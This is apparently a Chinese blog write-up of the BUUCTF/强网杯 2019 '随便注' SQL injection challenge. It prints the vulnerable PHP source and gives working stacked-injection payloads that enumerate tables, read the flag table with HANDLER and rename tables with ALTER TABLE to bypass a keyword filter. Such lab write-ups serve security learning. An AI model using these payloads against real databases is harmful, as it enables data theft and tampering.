大佬的完整wp：buuctf-web-[强网杯 2019]随便注-wp_取材于某次真实环境渗透,只说一句话:开发和安全缺一不可-CSDN博客

知识点：

• 单引号字符型绕过
• 堆叠注入
  • 可以执行多条语句
  • multi_query()：该函数可能引发堆叠注入
• handler用法
  • mysql专属，可替代select部分功能
  • handler 表名 open;handler 表名 read next;handler 表名 close;
  • 和文件操作类似，先打开一个表，读取表内容（一条记录），关闭表

  • # 打开一个表名为 tbl_name 的表的句柄
    HANDLER tbl_name OPEN [ [AS] alias]# 1、通过指定索引查看表，可以指定从索引那一行开始，通过 NEXT 继续浏览
    HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)[ WHERE where_condition ] [LIMIT ... ]# 2、通过索引查看表
    # FIRST: 获取第一行（索引最小的一行）
    # NEXT: 获取下一行
    # PREV: 获取上一行
    # LAST: 获取最后一行（索引最大的一行）
    HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }[ WHERE where_condition ] [LIMIT ... ]# 3、不通过索引查看表
    # READ FIRST: 获取句柄的第一行
    # READ NEXT: 依次获取其他行（当然也可以在获取句柄后直接使用获取第一行）
    # 最后一行执行之后再执行 READ NEXT 会返回一个空的结果
    HANDLER tbl_name READ { FIRST | NEXT }[ WHERE where_condition ] [LIMIT ... ]# 关闭已打开的句柄
    HANDLER tbl_name CLOSE
    

• strstr函数对大小写不敏感；可以利用大小写绕过
• 数据库相关知识
  • show databases;
  • show tables;
  • show tables from 数据库名；
  • show columns from 表名;
  • desc 表名;
• 这道题中的表名必须用 反引号进行包裹；如`words` `123456`;要不然不识别
• 解题方法
  • 方法1：handler代替select绕过
    • 使用handler函数进行操作;这里是bp抓包中的payload，所有空格都用+代替了，而且相关特殊符号也用url编码了
      • payload:inject=1'+;handler+`1919810931114514`+open;handler+`1919810931114514`+read+next;%23
  • 方法2：表名操作绕过
    • 通过修改表名和字段名进行绕过
      • 先把表名和字段名修改为界面能显示的字段数据，然后再让界面输出所有数据
        • ​​​​​​​​​payload:inject=1';+alter+table+words+rename+to+words1;alter+table+`1919810931114514`+rename+to+words;alter+table+words+change+flag+id+varchar(50);%23
        • payload:inject=1'+or+1=1%23
  • 方法3：预编译绕过（这种方法没做）
    • 直接定义一条语句给变量，然后执行该变量
    • strstr函数不能区分大小写，利用大小写绕过set prepare等关键字检测
    • 流程

      • set用于设置变量名和值
        prepare用于预备一个语句，并赋予名称，以后可以引用该语句
        execute执行语句
        deallocate prepare用来释放掉预处理的语句
        

源码如下：（本题无提示，源码自己找的）

<html><head><meta charset="UTF-8"><title>easy_sql</title>
</head><body>
<h1>取材于某次真实环境渗透，只说一句话：开发和安全缺一不可</h1>
<!-- sqlmap是没有灵魂的 -->
<form method="get">姿势: <input type="text" name="inject" value="1"><input type="submit">
</form><pre>
<?php
function waf1($inject) {preg_match("/select|update|delete|drop|insert|where|\./i",$inject) && die('return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);');
}
function waf2($inject) {strstr($inject, "set") && strstr($inject, "prepare") && die('strstr($inject, "set") && strstr($inject, "prepare")');
}
if(isset($_GET['inject'])) {$id = $_GET['inject'];waf1($id);waf2($id);$mysqli = new mysqli("127.0.0.1","root","root","supersqli");//多条sql语句$sql = "select * from `words` where id = '$id';";$res = $mysqli->multi_query($sql);if ($res){//使用multi_query()执行一条或多条sql语句do{if ($rs = $mysqli->store_result()){//store_result()方法获取第一条sql语句查询结果while ($row = $rs->fetch_row()){var_dump($row);echo "<br>";}$rs->Close(); //关闭结果集if ($mysqli->more_results()){  //判断是否还有更多结果集echo "<hr>";}}}while($mysqli->next_result()); //next_result()方法获取下一结果集，返回bool值} else {echo "error ".$mysqli->errno." : ".$mysqli->error;}$mysqli->close();  //关闭数据库连接
}
?>
</pre></body></html>

通过观察源码发现有两层waf

前戏就不演示了，通过不断的测试发现这里存在堆叠注入，而且还有waf过滤，最关键的是把select和英文句号给过滤了，而且提示内容给出了waf1的信息，到这里我就蒙了，这怎么搞呀，最多能看一下表名和字段名，想使用outfile写入文件发现英文句号被过滤了，彻底把我难住了；看了一下大佬的wp才发现了新大陆，大佬的wp放到开头了

这里是单引号的字符型绕过

通过堆叠执行的前置命令：

• 开始通过执行下面的命令获取到了关键的表名和字段名，flag就在数字表名中
• 表名一定要加``符号（反引号）；不然不识别；我就是这里被卡死了
• 1';show+databases;--+
• 1';show+tables;--+
• 1';show+columns+from+`1919810931114514`;--+
  • 或者1';desc+`1919810931114514`;--+
• 1';desc+`words`;--+
• 1'+order+by+2--+
  • 1'+order+by+3--+

直接上关键节点：

方法1：

handler绕过：

payload:inject=1'+;handler+`1919810931114514`+open;handler+`1919810931114514`+read+next;%23

方法2：

修改表名和字段名绕过

payload:inject=1';+alter+table+words+rename+to+words1;alter+table+`1919810931114514`+rename+to+words;alter+table+words+change+flag+id+varchar(50);%23

payload:inject=1'+or+1=1%23

方法3这里就不演示了，每种方法都得重启一遍靶场，可以直接看开头大佬的wp，写的很详细；

我这里主要是记一下sql注入的知识点，一些离奇的绕过方法

10